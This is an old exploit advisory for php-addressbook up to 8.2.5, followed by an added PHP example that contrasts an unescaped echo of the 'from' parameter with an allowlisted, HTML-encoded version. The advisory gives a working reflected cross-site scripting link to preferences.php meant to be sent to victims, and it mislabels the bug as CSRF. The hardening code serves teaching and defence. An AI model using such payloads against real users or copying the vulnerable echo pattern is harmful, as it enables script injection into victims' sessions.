php address book CSRF

Jun 6th, 2013
#########################################################################

[+] Exploit Title : php address book CSRF
[+] Author : Pablo '7days' Riberio
[+] Team: So Good Security
[+] Other 0days : http://pastebin.com/u/7days
[+] Version : <= 8.2.5
[+] Tested on : windows/internet explorer
[+] Details: Cross-Site Scripting
[+] Vendor: http://sourceforge.net/projects/php-addressbook/?source=directory
#########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
my home boy linus, all the cockneys and my grandma <3
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
no thnx 2: microsoft, windoz, estate agents and recruiters
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
portuguese cyber army
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] Begin 0day
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Send the user a link to this page to trigger the issue:
http://victim.com/preferences.php?from=%22%3E%3Cscript%3Ealert('7days');%3C/script%3E

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] End 0day
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
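
The following is an added example, not code from the advisory or from php-addressbook: it shows the output pattern that lets the `from` value above break out of its HTML context, next to a hardened form. It assumes `preferences.php` echoes `from` into an HTML attribute; the function names, the hidden-input markup, the allowlist pattern and the `index.php` fallback are all hypothetical.

```php
<?php
// Added example: hypothetical handling of the `from` parameter.
// The real preferences.php source is not shown in the advisory.

// Vulnerable pattern (assumed): the raw value lands inside an attribute,
// so a value starting with "> closes the attribute and then the tag.
function render_from_vulnerable(string $from): string
{
    return '<input type="hidden" name="from" value="' . $from . '">';
}

// Hardened, step 1: accept only a local .php script name with an
// optional simple query string; anything else falls back to a default.
function sanitize_from(string $from, string $default = 'index.php'): string
{
    if (preg_match('/\A[A-Za-z0-9_-]+\.php(\?[A-Za-z0-9_=&-]*)?\z/', $from) === 1) {
        return $from;
    }
    return $default;
}

// Hardened, step 2: encode for the HTML attribute context on output,
// even though the allowlist already rejected markup (defence in depth).
function render_from_hardened(string $from): string
{
    $safe = htmlspecialchars(sanitize_from($from), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="from" value="' . $safe . '">';
}

// Constructed sample inputs: the URL-decoded value from the advisory's
// link, and a benign return target.
$samples = [
    '"><script>alert(\'7days\');</script>',
    'edit.php?id=3',
];

foreach ($samples as $from) {
    echo "input:      $from\n";
    echo "vulnerable: " . render_from_vulnerable($from) . "\n";
    echo "hardened:   " . render_from_hardened($from) . "\n\n";
}
```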